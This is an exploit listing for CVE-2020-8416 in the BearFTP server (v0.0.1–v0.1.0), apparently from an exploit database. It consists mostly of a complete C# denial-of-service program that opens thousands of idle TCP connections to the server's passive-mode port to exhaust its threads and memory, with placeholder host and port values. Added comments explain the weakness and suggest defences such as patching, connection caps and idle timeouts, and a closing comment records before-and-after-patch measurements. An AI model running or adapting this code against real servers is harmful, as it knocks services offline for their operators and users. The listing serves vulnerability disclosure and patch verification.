# Exploit Title: BearFTP 0.1.0 - 'PASV' Denial of Service
# Date: 2020-01-29
# Exploit Author: kolya5544
# Vendor Homepage: http://iktm.me/
# Software Link: https://github.com/kolya5544/BearFTP/releases
# Version: v0.0.1 - v0.1.0
# Tested on: Ubuntu 18.04
# CVE : CVE-2020-8416
// Reproduction case for CVE-2020-8416 (BearFTP v0.0.1 - v0.1.0, per the header above).
// It opens a large number of TCP connections to the server's PASV port and then leaves
// every one of them idle: nothing is ever written to or read from the sockets.
// The measurements recorded with this listing show the unpatched server growing to
// thousands of threads under this load, while the patched build stays at 10 threads at
// most - so the weakness appears to be unbounded per-connection resource allocation on
// the passive listener (inferred from those numbers, not from the server source).
// Defensive takeaways: run a patched release, cap concurrent connections and apply an
// idle timeout on the passive port range, and treat many established-but-silent
// connections from one source to that range as a detection signal.
static void Main(string[] args)
{
    // Body of each worker thread: open one connection and keep it open indefinitely.
    void HoldIdleConnection()
    {
        // Background threads do not keep the process alive on their own.
        Thread.CurrentThread.IsBackground = true;

        // "HOSTNAME" and PASV_PORT are the author's placeholders for the test target.
        TcpClient client = new TcpClient("HOSTNAME", PASV_PORT); //Replace with actual data to test it.
        var stream = client.GetStream();

        // Reader and writer are created but never used; the connection stays silent.
        StreamWriter writer = new StreamWriter(stream);
        writer.AutoFlush = true;
        StreamReader reader = new StreamReader(stream);

        // Park the thread so the socket is never closed.
        for (;;)
        {
            Thread.Sleep(5000);
        }
    }

    Console.WriteLine("DoS started. Approx. time to complete: 204 seconds.");

    // 1024*8 = 8192 connection attempts spaced 25 ms apart, which is where the
    // ~204 second estimate comes from. The author notes the server usually ends up
    // spawning only about half of them.
    int started = 0;
    while (started < 1024 * 8)
    {
        Thread holder = new Thread(HoldIdleConnection);
        holder.Start();

        // The author's pacing: one new connection every 25 ms.
        Thread.Sleep(25);
        started++;
    }

    // Keep the process (and therefore the idle connections) alive, reporting
    // every 20 seconds.
    for (;;)
    {
        Console.WriteLine("DoS attack completed!");
        Thread.Sleep(20000);
    }
}
/*
BEFORE PATCH APPLIED (after ~100 seconds of attacking):
3700 threads spawned, VIRT went from 3388M to 32.1G, RES from 60000 to 129M. CPU usage ~10%. The server struggles to process commands. It recovers several minutes after the attack is stopped.
AFTER PATCH APPLIED:
10 threads spawned at most, VIRT didn't change, RES didn't change. CPU usage ~3%. Works fine.
*/